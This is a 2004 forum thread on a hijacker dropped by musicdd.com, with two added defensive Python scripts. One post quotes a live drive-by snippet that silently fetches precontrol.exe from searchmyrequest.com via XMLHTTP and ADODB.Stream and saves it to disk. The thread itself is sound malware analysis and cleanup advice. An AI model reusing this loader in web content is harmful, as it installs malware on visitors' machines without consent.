Virus at www.musicdd.com?
Sylvander
02-26-2004, 09:31 AM
Whilst browsing the web I visited www.musicdd.com and the AVG Anti-Virus program installed on my PC reported that it had intercepted a virus and was about to deal with it, which it did.
Was this really a website attempting to infect my PC?
I have just clicked on the above link and again AVG reported the virus "JS/Psyme".
Does such a virus exist?
YODA74
02-26-2004, 09:47 AM
http://tinyurl.com/2yda2
You may want to take a look at this. Usually js is just JavaScript or vbs.
Really shouldn't post the link ???? Dumb asses like me like to click on things :D Hey just by clicking on it won't give you anything looks to me like someone doesn't want you to see the site just like a lot of porn places. they put up fakes to scare you..... gotta love fanatic groups....OH that's not politically correct...You gotta love speeeecialllll interest groups.;)
John0904
02-26-2004, 10:10 AM
Being a risk taker and a brave soul that I am, I clicked that link and my up to-date AVG Anti-Virus program did not report any viruses.
I did a Google search for "JS/Psyme" virus and it does seem to exist.
It looks like a reputable web site. Unlikely it would be infected.
Of course looks can be deceiving. :) But still unlikely unless their web site was compromised.
Steve
02-26-2004, 10:36 AM
Being known as one of the dumb asses that click on links, ;) I gave it a click (on my test comp) which is currently running Norton AV. Norton didn't pick anything up which isn't surprising. Norton doesn't do much with trojans. But Zone Alarm notified me that precontrol.exe was trying to access the internet.
So I looked up precontrol.exe and found THIS (http://www.pestpatrol.com/PestInfo/s/super-spider.asp) . Looks like that site is setting a hijacker on your (and my) computer. How rude.
Sylvander and anyone else who clicked the link should probably follow Pest Patrol's removal instructions and clean things up.
1. Not everything your AV says is a virus/trojan is that...especially from websites.
It is most likely a hijacker, but since they need to call them something...........
2. You can click the little check box, "Automatically parse URLs: " to clear it to prevent posting links....
malcore
02-26-2004, 10:57 AM
re Steve's link. They advise removing a file called control.exe. Be careful, in Windows this could very well be your control panel in C:\Windows\System32 and C:\Windows\System32\dllcache or in 9x C:\Windows.
John0904
02-26-2004, 11:15 AM
Hmm... Either I am lacking in security or something else is wrong.
I didn't think about spyware or such.
I revisited the link and "forced" refreshed it several times and ran both ad-ware and spybot. Both came up clean.
I did a search for *control.exe on my computer and it just showed control.exe which I ran and that just opened my control panel.
I checked the html on that page and the only thing that caught my eye was a reference from fastclick.
Am I missing something or is my security lacking?
shanmuga
02-26-2004, 11:32 AM
Hi John0904, relax. It might also mean you are very well protected.
Steve
02-26-2004, 12:02 PM
Just as a check, I ran HJT and cleaned out all the junk. Followed PestPatrol's suggestions, rebooted, ran HJT again and it showed a clean log.
I then went back to the site, ZA once again picked up on precontrol.exe trying to access the internet. I declined. I shut down, rebooted and restarted IE. Yes indeed, the browser was hijacked to "searchmyrequest".
I ran HJT again and produced this log...
Logfile of HijackThis v1.97.7
Scan saved at 11:50:11 AM, on 2/26/2004
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\NORTON~1\navapw32.exe
C:\PROGRA~1\ZONELA~1\ZONEAL~1\zlclient.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
A:\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://searchmyrequest.com/sp.php
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://searchmyrequest.com/hp.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,HomeOldSP = http://searchmyrequest.com/hp.php
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [NAV Agent] C:\PROGRA~1\NORTON~1\navapw32.exe
O4 - HKLM\..\Run: [Zone Labs Client] C:\PROGRA~1\ZONELA~1\ZONEAL~1\zlclient.exe
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
That site is definitely setting a hijacker. Don't you just love it...:rolleyes:
Keep in mind I am running XP and IE without SP1 and my only protection is Norton AV and ZA free.
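As an added illustration (not code from the thread, from HijackThis, or from any tool mentioned here), this Python script pulls the R0/R1 entries out of a HijackThis log like the one posted above and flags any start page or search page that points at a host outside an allowlist. The log excerpt is copied from Steve's log; the allowlist of trusted hosts is an assumption you would replace with your own.

```python
import re
from urllib.parse import urlparse

# Excerpt of the HijackThis log posted in the thread. R0/R1 lines record IE
# start/search page settings; the O2/O4 lines are included to show they are ignored.
SAMPLE_LOG = r"""Logfile of HijackThis v1.97.7
R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://searchmyrequest.com/sp.php
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://searchmyrequest.com/hp.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,HomeOldSP = http://searchmyrequest.com/hp.php
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [NAV Agent] C:\PROGRA~1\NORTON~1\navapw32.exe
"""

# Assumed allowlist: hosts you consider legitimate defaults for home/search pages.
TRUSTED_HOSTS = {"msn.com", "microsoft.com", "google.com"}

# "R0 - <registry key>,<value name> = <url>" / "R1 - ..." lines.
R_LINE = re.compile(r"^(?P<section>R[01]) - (?P<key>[^,]+),(?P<value>[^=]+?) = (?P<url>\S+)$")


def parse_r_entries(log_text):
    """Return the R0/R1 entries as dicts with section, key, value, url and host."""
    entries = []
    for line in log_text.splitlines():
        m = R_LINE.match(line.strip())
        if not m:
            continue
        entry = m.groupdict()
        entry["host"] = (urlparse(entry["url"]).hostname or "").lower()
        entries.append(entry)
    return entries


def flag_hijacks(entries, trusted_hosts):
    """Keep entries whose URL host is neither a trusted host nor a subdomain of one."""
    flagged = []
    for entry in entries:
        host = entry["host"]
        if not host:  # about:blank, res://, local files: nothing to compare
            continue
        if any(host == t or host.endswith("." + t) for t in trusted_hosts):
            continue
        flagged.append(entry)
    return flagged


def hijack_hosts(log_text, trusted_hosts):
    """Sorted list of distinct untrusted hosts referenced by R0/R1 entries."""
    return sorted({e["host"] for e in flag_hijacks(parse_r_entries(log_text), trusted_hosts)})


if __name__ == "__main__":
    for e in flag_hijacks(parse_r_entries(SAMPLE_LOG), TRUSTED_HOSTS):
        print(f'{e["section"]} {e["value"]} -> {e["url"]}')
    print("hosts to investigate:", hijack_hosts(SAMPLE_LOG, TRUSTED_HOSTS))
```

Running it against the excerpt reports searchmyrequest.com for all six R entries, which is the same conclusion Steve drew by eye; the point of scripting it is that the check can be repeated after every cleanup and reboot without re-reading the whole log.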
Sylvander
02-26-2004, 12:10 PM
I scanned my C: drive using the Trend link given by Yoda, and no infected files were found.
I have "C:\Windows\control.exe", but that's just the control panel executable.
It seems AVG did a good job of catching and blocking this.
shanmuga
02-26-2004, 12:37 PM
Keep in mind I am running XP and IE without SP1 and my only protection is Norton AV and ZA free.
Just curious Steve, how secure are you otherwise? I didn't have any problems with visiting that site with multiple browsers, IE and its clones like Avant, Crazy, Smart Explorer etc, Opera and of course Firefox with XP and IE SP1 patched fully. I am also behind ZA Pro but running AVG free.
PrntRhd
02-26-2004, 12:58 PM
I did google search on the JS/Psyme name, link mentions ByteVerify also.
What Java are you running, JVM or Sun Java?
Steve
02-26-2004, 12:59 PM
Just curious steve, how secure are you otherwise ?
Keep in mind, that was just one of my test computers. I keep the protection marginal in order to play with these types of things. I know, it's kind of weird but I find it interesting.
On my main computer, I run AVG, ZoneAlarm, Spybot, AdAware and SpywareBlaster. I run HJT once a week just to check. I have SP1 and all of the Windows updates. I use Sun Java instead of MS. I use Firefox and Thunderbird instead of IE and OE.
That seems to do the job. :)
Yes, that one is related to the ByteVerify bug....both JVM "infectors".
ByteVerify is commonly used by the CWS family of hijackers.
PrntRhd
02-26-2004, 09:04 PM
I am finding the ByteVerify getting caught on my 98SE machine too even though it has Sun Java 1.4.2_03/Firebird 0.7/ZA/router w NAT/NAV2003.
I am not certain it can execute when it downloads however.
HJT is coming out clean after the last quarantine.
CWS is clean too.
The key is whether it can execute.
PrntRhd
02-27-2004, 12:33 AM
Sylvander,
I just added Javacool's (free) Spywareblaster to my problem computer, will see if it can help with similar issues that you had.
Yes, with the Sun Java package ByteVerify can still be downloaded but you are correct it will not execute.
About the only thing it can do without the MS JVM is cause your AV to pop up annoying warnings.
Sylvander
02-27-2004, 03:44 AM
How do I find out which I'm running?
Would SISoft Sandra help?
By the way, I have the latest copy [v2.6.1 got 14th Feb] of the installation file for "Spywareblaster", but I'm wary of installing it.
The last [and 1st] time I installed it [v2.5.1 & v2.5.2] I had difficulties and ended up in communication with the author trying to get it right.
In the end I gave up and uninstalled it.
I have "Spywareguard" installed and since I've never really become aware of a need that isn't being fulfilled I'm just chugging along as is.
The problem I had related to versions of DirectX drivers.
I needed an updated "mscomctl.ocx" cabinet file [can't remember the details].
John0904
02-27-2004, 10:33 AM
I went back to that web site once more and both ad-ware and spybot came up clean. Also my Hijackthis.log was clean as well.
The only thing I noticed that I missed was that IE blocked 3rd party cookies. Could that be the culprit? I wouldn't think so since cookies are just text based.
In all honesty, I cannot see a web site spreading viruses. Their domain is registered with ARIN or the like. As far as I know, that particular web site has been in operation since 2002.
And this precontrol.exe, isn't a browser supposed to warn you that this file that is about to run on your computer could be a possible virus? I'm sure if you accepted the file, that an anti-virus would catch it thereafter.
Not sure what browsers you all are using but with mine, any file that attempts to download, I get a popup asking if I want to save this file. If I didn't click a download link, red flags popup. I do not have my browser to automatically open files. Duh. :)
So two questions come to mind...
1. Was your system completely clean to start off with? If so...
2. Why this particular web site that triggered alarms?
Sorry if I seem persistent on this but it's like an itch that can't be reached. :D
shanmuga
02-27-2004, 11:28 AM
Originally posted by sylvander,
How do I find out which I'm running?
Would SISoft Sandra help?
Don't know about Sandra, but this site tells you clearly: http://javatester.org/version.html
Steve
02-27-2004, 02:32 PM
Sorry if I seem persistent on this but it's like an itch that can't be reached.
Don't be sorry John, I find this kind of thing very interesting too. ;)
I just tried it again. I got the ZA warning that precontrol.exe was trying to access the internet. This time I let it and Norton instantly sent up a virus alert.
Norton AntiVirus has detected a virus on your computer.
Object Name: C:\Documents and Settings\Steve\Local Settin...\justfun[1].exe
Object Name: C:\WINDOWS\leugukpa43.exe
Virus Name: Trojan.StartPage
Action Taken: Unable to repair this file.
So it seems the site drops the precontrol.exe file and then when it makes contact to the 'net it loads the Trojan.StartPage virus.
Here (http://securityresponse.symantec.com/avcenter/venc/data/trojan.startpage.html) is what Norton has to say about it.
Funny. On my main machine I can't even access the musicdd page. :confused:
In all honesty, I cannot see a web site spreading viruses.
Most web sites do not see these things as viral, but as a means of providing advertising revenue. Most hijackers are exactly that, a means of generating some revenue for the hosting site. Most often the "affiliate" programs related to these items aren't all that great, and you need to install hundreds of the farggin things to make any money....
isn't a browser suppose to warn you that this file that is about to run on your computer could be a possible virus?
No, your browser has no idea what is/isn't viral. It can warn about signed/unsigned ActiveX items (if running IE), but even a signed ActiveX doesn't mean "clean"...Gator/Claria and others are "signed".
This exploit is Java based and the MS JVM has no such warning structure built in....
Not sure what browsers you all are using but with mine, any file that attempts to download, I get a popup asking if I want to save this file.
So, what is this magic browser that will not execute any Java, JavaScript or any embedded media file without asking first?
So two questions come to mind...
1. Was your system completely clean to start off with? If so...
2. Why this particular web site that triggered alarms?
1. That may need to be answered, but with this particular item, it doesn't really matter. It uses a known exploit, and infects by "drive-by" download, even from "legit" sites.
2. Because that site is actually dropping a file on the machine that is currently classified as a trojan!
<script LANGUAGE="JScript.Encode" src="ht.tp://therealsearch.com/secure.js">
</SCRIPT>
<script LANGUAGE="JavaScript" src="http://therealsearch.com/affiliates/secure.php?acc=143">
</SCRIPT>
(those two scripts are what does it...the PHP page contains a download link for precontrol.exe....so it is a series of nested scripts that does it)
therealsearch is a known gackware peddler........
Also on that page are fastclick cookies........
ht'+'tp://media.fastclick.net/w
Hitbox cookies....
ht '+' tp://hg1.hitbox.com
For a "legit" site it sure contains a boatload of gackware........
Lesson: not all supposedly "legit" sites are "clean".
John0904
02-27-2004, 04:55 PM
Originally posted by mjc
This exploit is Java based and the MS JVM has no such warning structure built in....
I use Sun Java. Could that be why I am not seeing anything?
So, what is this magic browser that will not execute any Java, JavaScript or any embedded media file without asking first?
IE 6.x Tools > Internet Options > Security > Internet > Custom Level... Have everything Prompted or Disabled. (As deemed fitting.)
Because that site is actually dropping a file on the machine that is currently classified as a trojan!
<script LANGUAGE="JScript.Encode" src="ht.tp://therealsearch.com/secure.js">
</SCRIPT>
<script LANGUAGE="JavaScript" src="http://therealsearch.com/affiliates/secure.php?acc=143">
</SCRIPT>
(those two scripts are what does it...the PHP page contains a download link for precontrol.exe....so it is a series of nested scripts that does it)
That site is not dropping any "file" on my machine that I can see. As a final test, I put my IE Internet security at the lowest settings. Again, nothing out of the ordinary.
Which tells me that the site (or its advertisers) is just selecting certain computers and/or IP addresses.
Also on that page are fastclick cookies........
I knew about that. I have 3rd party cookies blocked by default. :)
What could I do to actually be affected by this web site? Use a different browser? Shut down my firewall, anti-virus program and bypass my router?
Because if this web site is actually passing any virus, I'll contact US-CERT myself and get the ball rolling.
Go for it.........
The second script is the one that actually calls the download.
It is a page hosted on therealsearch server.
// Gated on the affiliate id and on a marker cookie: a browser that already
// carries the cookie (or refuses third-party cookies) is served nothing.
if(accountnum == 143 && !getCookie("newwebmaster11")){
document.writeln("<textarea id=\"code\" style=\"display:none;\">");
// Fetches the executable through the XMLHTTP ActiveX control and writes it to
// disk with ADODB.Stream, so no browser download prompt is ever shown.
document.writeln("var x=new ActiveXObject(\"Microsoft.XMLHTTP\");");
document.writeln("var y=new ActiveXObject(\"ADODB.Stream\");");
document.writeln("x.Open(\"GET\",\"ht.tp://searchmyrequest.com/precontrol.exe\",0);");
document.writeln("x.Send();y.Mode=3;y.Type=1;y.Open();");
document.writeln("y.Write(x.responseBody);");
document.writeln("try{y.SaveToFile(\"c:/precontrol.exe\",2);}catch(e){;}");
document.writeln("</textarea>");
}
So it could be that since you have all third party cookies blocked it is assuming you don't exist or already have had the cookie.
The problem is that most of these things are in a grey area that for the most part CERT ignores......
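As an added example, not code from the thread or from any of the sites it names: a small Python scanner that looks, in fetched page or script text, for the markers of the cookie-gated XMLHTTP/ADODB.Stream drop quoted above (encoded loader script, hidden textarea, the two ActiveX objects, SaveToFile, a cookie check) and pulls out any .exe URL it finds. The sample input is assembled from the defanged snippets quoted in the thread ("ht.tp" is the thread's own defanging and is matched as such); the indicator names and the simple count-based score are my own choices.

```python
import re

# Constructed sample: the loader tag and the affiliate script quoted in the thread,
# with the defanged "ht.tp" URLs left exactly as posted.
SAMPLE_SCRIPT = r'''
<script LANGUAGE="JScript.Encode" src="ht.tp://therealsearch.com/secure.js">
</SCRIPT>
if(accountnum == 143 && !getCookie("newwebmaster11")){
document.writeln("<textarea id=\"code\" style=\"display:none;\">");
document.writeln("var x=new ActiveXObject(\"Microsoft.XMLHTTP\");");
document.writeln("var y=new ActiveXObject(\"ADODB.Stream\");");
document.writeln("x.Open(\"GET\",\"ht.tp://searchmyrequest.com/precontrol.exe\",0);");
document.writeln("x.Send();y.Mode=3;y.Type=1;y.Open();");
document.writeln("y.Write(x.responseBody);");
document.writeln("try{y.SaveToFile(\"c:/precontrol.exe\",2);}catch(e){;}");
document.writeln("</textarea>");
}
'''

# Indicator regexes (my own names) for the drop technique shown in the thread.
INDICATORS = {
    "encoded_loader": re.compile(r'LANGUAGE\s*=\s*"JScript\.Encode"', re.I),
    "hidden_textarea": re.compile(r"<textarea[^>]*display\s*:\s*none", re.I),
    "xmlhttp_object": re.compile(r'ActiveXObject\(\s*"Microsoft\.XMLHTTP"', re.I),
    "adodb_stream": re.compile(r'ActiveXObject\(\s*"ADODB\.Stream"', re.I),
    "save_to_file": re.compile(r"\.SaveToFile\(", re.I),
    "cookie_gate": re.compile(r"!\s*getCookie\(", re.I),
}

# Quoted URL ending in .exe; accepts the thread's "ht.tp" defanging as well as http(s).
EXE_URL = re.compile(r"""["']((?:ht\.?tp|https?)://[^"'\s]+\.exe)["']""", re.I)

# document.writeln("...") with a JS string literal (handles \" escapes inside it).
WRITELN = re.compile(r'document\.writeln\("((?:[^"\\]|\\.)*)"\);')


def unescape_writeln(text):
    """Replace each document.writeln("...") call with the text it would emit,
    so markers split across string literals are visible to the indicator regexes."""
    return WRITELN.sub(lambda m: m.group(1).replace('\\"', '"'), text)


def analyze_script(text):
    """Return the indicators hit, any .exe URLs found, and a score (= number of hits)."""
    plain = unescape_writeln(text)
    hits = [name for name, rx in INDICATORS.items() if rx.search(plain)]
    return {"indicators": hits, "exe_urls": EXE_URL.findall(plain), "score": len(hits)}


if __name__ == "__main__":
    result = analyze_script(SAMPLE_SCRIPT)
    print("score:", result["score"])
    print("indicators:", ", ".join(result["indicators"]))
    print("exe urls:", result["exe_urls"])
```

On the sample all six indicators fire and the precontrol.exe URL is recovered, whereas an ordinary document.writeln that emits plain HTML scores zero. Because the payload here is wrapped in document.writeln string literals, scanning the raw text alone would miss most of the markers; that is why the writeln strings are unescaped first.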
Steve
02-28-2004, 05:01 PM
Not to beat a dead horse, but I decided to install SP1 and all the XP updates and give it another try. Nothing. No ZA warnings. No Norton virus alerts. Whether it is SP1 or the updates I don't know but they did the trick.
Hmmm...M$ is helping to block hijackers. Who would have thought...;)
John0904
02-29-2004, 09:59 AM
Thanks Steve. Just the info I needed.
I indeed have SP1 plus all the other updates which is why I wasn't seeing anything.
But could precontrol.exe be considered a virus? Myself, I would think so. It may not pass on person to person, but nevertheless, it can install itself and make unwanted changes to a browser and or system.
What about byteverify/JS/Psyme? If an anti-virus program detects it, must be.
One last question...
Is this web site causing this, its advertisers or both?
I'll start sending out emails about that web site.
I will also submit this thread as corroborating evidence.
Edit:
Even if the web site directly may not be causing this, they should be responsible for their advertisers.
Steve
02-29-2004, 11:49 AM
could precontrol.exe be considered a virus?
I don't know. Virus, trojan, hijacker, spyware, adware, gackware, slimeware, who knows. Are there actual definitions for these things? ;)
For virus, trojan and worm definitions look at any of the major AV sites.
Lavasoft and Spybot both have definitions of spyware.
Gackware is my catch-all term for all of the above...slimeware, etc are also catch-all words.
A hijacker is a specific type of gackware that surreptitiously changes home page and search settings to use its creator's web pages.